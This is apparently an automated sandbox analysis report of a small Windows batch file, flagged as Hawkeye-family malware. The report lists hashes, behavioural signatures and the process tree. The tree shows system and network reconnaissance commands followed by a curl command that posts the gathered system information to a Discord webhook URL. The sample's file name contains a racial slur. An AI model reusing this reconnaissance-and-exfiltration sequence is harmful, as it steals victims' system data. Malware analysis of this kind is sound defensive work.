Analysis
-
max time kernel
105s -
max time network
128s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
01/04/2025, 14:44
Static task
static1
General
-
Target
niggagimeinfo.bat
-
Size
732B
-
MD5
a874910a487c124be0f303e1c626091c
-
SHA1
1f160820d42a658baf7b4fa3759847d2acdef6a0
-
SHA256
c6c4ab9000f281ecd77ca3a6bc7d1c9844c5d28bb19a8ee416a8c6cc1e597987
-
SHA512
df0381058099400a48f1e63f22141d9a0f385a6ab427df4ecc55331f85347a6ebb0d4eecca3491a39496bc91098ef3efffce941f3e03ced308505da565ff9041
Malware Config
Signatures
-
Hawkeye family
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 28 discord.com 29 discord.com -
Collects information from the system 1 TTPs 1 IoCs
Uses WMIC.exe to find detailed system information.
pid Process 4788 WMIC.exe -
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
pid Process 2708 ipconfig.exe 4836 ipconfig.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 5180 systeminfo.exe -
Suspicious use of AdjustPrivilegeToken 43 IoCs
description pid Process Token: SeDebugPrivilege 2260 whoami.exe Token: SeIncreaseQuotaPrivilege 4788 WMIC.exe Token: SeSecurityPrivilege 4788 WMIC.exe Token: SeTakeOwnershipPrivilege 4788 WMIC.exe Token: SeLoadDriverPrivilege 4788 WMIC.exe Token: SeSystemProfilePrivilege 4788 WMIC.exe Token: SeSystemtimePrivilege 4788 WMIC.exe Token: SeProfSingleProcessPrivilege 4788 WMIC.exe Token: SeIncBasePriorityPrivilege 4788 WMIC.exe Token: SeCreatePagefilePrivilege 4788 WMIC.exe Token: SeBackupPrivilege 4788 WMIC.exe Token: SeRestorePrivilege 4788 WMIC.exe Token: SeShutdownPrivilege 4788 WMIC.exe Token: SeDebugPrivilege 4788 WMIC.exe Token: SeSystemEnvironmentPrivilege 4788 WMIC.exe Token: SeRemoteShutdownPrivilege 4788 WMIC.exe Token: SeUndockPrivilege 4788 WMIC.exe Token: SeManageVolumePrivilege 4788 WMIC.exe Token: 33 4788 WMIC.exe Token: 34 4788 WMIC.exe Token: 35 4788 WMIC.exe Token: 36 4788 WMIC.exe Token: SeIncreaseQuotaPrivilege 4788 WMIC.exe Token: SeSecurityPrivilege 4788 WMIC.exe Token: SeTakeOwnershipPrivilege 4788 WMIC.exe Token: SeLoadDriverPrivilege 4788 WMIC.exe Token: SeSystemProfilePrivilege 4788 WMIC.exe Token: SeSystemtimePrivilege 4788 WMIC.exe Token: SeProfSingleProcessPrivilege 4788 WMIC.exe Token: SeIncBasePriorityPrivilege 4788 WMIC.exe Token: SeCreatePagefilePrivilege 4788 WMIC.exe Token: SeBackupPrivilege 4788 WMIC.exe Token: SeRestorePrivilege 4788 WMIC.exe Token: SeShutdownPrivilege 4788 WMIC.exe Token: SeDebugPrivilege 4788 WMIC.exe Token: SeSystemEnvironmentPrivilege 4788 WMIC.exe Token: SeRemoteShutdownPrivilege 4788 WMIC.exe Token: SeUndockPrivilege 4788 WMIC.exe Token: SeManageVolumePrivilege 4788 WMIC.exe Token: 33 4788 WMIC.exe Token: 34 4788 WMIC.exe Token: 35 4788 WMIC.exe Token: 36 4788 WMIC.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 3656 wrote to memory of 2864 3656 cmd.exe 87 PID 3656 wrote to memory of 2864 3656 cmd.exe 87 PID 3656 wrote to memory of 2260 3656 cmd.exe 88 PID 3656 wrote to memory of 2260 3656 cmd.exe 88 PID 3656 wrote to memory of 5180 3656 cmd.exe 89 PID 3656 wrote to memory of 5180 3656 cmd.exe 89 PID 3656 wrote to memory of 4292 3656 cmd.exe 90 PID 3656 wrote to memory of 4292 3656 cmd.exe 90 PID 3656 wrote to memory of 4836 3656 cmd.exe 96 PID 3656 wrote to memory of 4836 3656 cmd.exe 96 PID 3656 wrote to memory of 4544 3656 cmd.exe 97 PID 3656 wrote to memory of 4544 3656 cmd.exe 97 PID 3656 wrote to memory of 2708 3656 cmd.exe 98 PID 3656 wrote to memory of 2708 3656 cmd.exe 98 PID 3656 wrote to memory of 2688 3656 cmd.exe 99 PID 3656 wrote to memory of 2688 3656 cmd.exe 99 PID 3656 wrote to memory of 4788 3656 cmd.exe 100 PID 3656 wrote to memory of 4788 3656 cmd.exe 100 PID 3656 wrote to memory of 4812 3656 cmd.exe 101 PID 3656 wrote to memory of 4812 3656 cmd.exe 101
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\niggagimeinfo.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3656 -
C:\Windows\system32\HOSTNAME.EXEhostname2⤵PID:2864
-
-
C:\Windows\system32\whoami.exewhoami2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2260
-
-
C:\Windows\system32\systeminfo.exesysteminfo2⤵
- Gathers system information
PID:5180
-
-
C:\Windows\system32\findstr.exefindstr /B /C:"OS Name" /C:"OS Version"2⤵PID:4292
-
-
C:\Windows\system32\ipconfig.exeipconfig2⤵
- Gathers network information
PID:4836
-
-
C:\Windows\system32\findstr.exefindstr IPv62⤵PID:4544
-
-
C:\Windows\system32\ipconfig.exeipconfig2⤵
- Gathers network information
PID:2708
-
-
C:\Windows\system32\findstr.exefindstr IPv42⤵PID:2688
-
-
C:\Windows\System32\Wbem\WMIC.exewmic logicaldisk get caption, freespace, size2⤵
- Collects information from the system
- Suspicious use of AdjustPrivilegeToken
PID:4788
-
-
C:\Windows\system32\curl.execurl -X POST https://discord.com/api/webhooks/1356637948279394315/wBsP0ldZy-OklbkGSc8jSiZ8Y16MimqHEj7Ln0Ff1INRHzRS024TSAFclzmg8-DVJw_b -H "Content-Type: application/json" -d "{\"content\": \"```\n$(type "C:\Users\Admin\AppData\Local\Temp\sysinfo.txt")\n```\"}"2⤵PID:4812
-